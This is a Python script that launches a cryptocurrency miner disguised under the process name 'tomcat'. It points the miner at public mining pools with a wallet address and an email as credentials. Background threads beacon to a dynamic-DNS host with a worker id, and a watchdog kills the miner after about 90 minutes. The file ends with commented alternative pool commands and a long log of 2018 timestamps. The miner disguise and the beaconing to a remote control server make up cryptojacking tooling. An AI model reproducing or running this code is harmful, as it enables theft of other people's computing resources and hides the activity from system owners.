import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:03:01.602500
#2018-02-17 16:49:06.521484
#2018-02-17 18:37:07.588095
#2018-02-17 20:26:04.386168
#2018-02-17 22:13:05.241390
#2018-02-17 23:57:04.169571
#2018-02-18 01:48:04.006047
#2018-02-18 03:34:05.388672
#2018-02-18 05:22:03.892501
#2018-02-18 07:13:01.378255
#2018-02-18 09:01:03.355688
#2018-02-18 10:48:04.834689
#2018-02-18 12:36:04.525855
#2018-02-18 14:22:02.076061
#2018-02-18 16:13:04.658415
#2018-02-18 18:02:05.270931
#2018-02-18 19:48:07.324430
#2018-02-18 21:34:07.231166
#2018-02-18 23:23:01.334608
#2018-02-19 01:10:03.055865
#2018-02-19 02:56:02.234477
#2018-02-19 04:43:07.292484
#2018-02-19 06:28:05.245920
#2018-02-19 08:18:05.831331
#2018-02-19 10:06:08.023278
#2018-02-19 11:55:06.218600
#2018-02-19 13:41:09.304655
#2018-02-19 15:29:06.465113
#2018-02-19 17:18:06.547006
#2018-02-19 19:07:04.797904
#2018-02-19 20:54:01.610251
#2018-02-19 22:43:07.827623
#2018-02-20 00:26:07.150323
#2018-02-20 02:13:07.382051
#2018-02-20 04:04:04.000919
#2018-02-20 05:47:07.875590
#2018-02-20 07:34:06.088607
#2018-02-20 09:19:04.195262
#2018-02-20 11:03:01.738946
#2018-02-20 12:49:01.956095
#2018-02-20 14:33:05.722181
#2018-02-20 16:17:08.852697
#2018-02-20 18:05:09.121682
#2018-02-20 19:56:08.253026
#2018-02-20 21:44:07.522090
#2018-02-20 23:25:01.553166
#2018-02-21 01:08:05.004057
#2018-02-21 02:55:06.809142
#2018-02-21 04:44:06.402830
#2018-02-21 06:32:05.844459
#2018-02-21 08:17:05.812528
#2018-02-21 10:04:01.856041
#2018-02-21 12:11:07.084630
#2018-02-21 13:59:06.731612
#2018-02-21 15:43:11.345703
#2018-02-21 17:34:08.297574
#2018-02-21 19:20:01.633023
#2018-02-21 21:09:01.990902
#2018-02-21 22:56:01.704387
#2018-02-22 00:44:08.139061
#2018-02-22 02:33:01.531432
#2018-02-22 04:19:04.797404
#2018-02-22 06:06:06.283156
#2018-02-22 07:51:06.001963
#2018-02-22 09:40:05.008177
#2018-02-22 11:25:01.455817
#2018-02-22 13:10:09.344371
#2018-02-22 15:01:07.648898
#2018-02-22 16:45:12.023000
#2018-02-22 18:33:01.976414
#2018-02-22 20:25:06.859900
#2018-02-22 22:11:01.947643
#2018-02-22 23:57:04.393737
#2018-02-23 01:44:07.050477
#2018-02-23 03:33:05.769607
#2018-02-23 05:19:05.212693
#2018-02-23 07:04:08.387062
#2018-02-23 08:54:04.383301
#2018-02-23 11:14:07.113173
#2018-02-23 13:08:01.529925
#2018-02-23 14:52:08.715617
#2018-02-23 16:41:10.149635
#2018-02-23 18:29:07.948631
#2018-02-23 20:13:07.438614
#2018-02-23 22:04:06.323872
#2018-02-23 23:53:05.468958
#2018-02-24 01:44:07.902375
#2018-02-24 03:35:07.898595
#2018-02-24 05:19:08.012084
#2018-02-24 07:07:06.619222
#2018-02-24 08:56:03.485090
#2018-02-24 10:55:05.647553
#2018-02-24 12:42:08.042986
#2018-02-24 14:31:03.912261
#2018-02-24 16:18:06.271920
#2018-02-24 18:12:05.758783
#2018-02-24 19:58:05.465173
#2018-02-24 21:42:07.193036
#2018-02-25 00:37:01.381810
#2018-02-25 03:33:04.248473
#2018-02-25 07:15:08.726432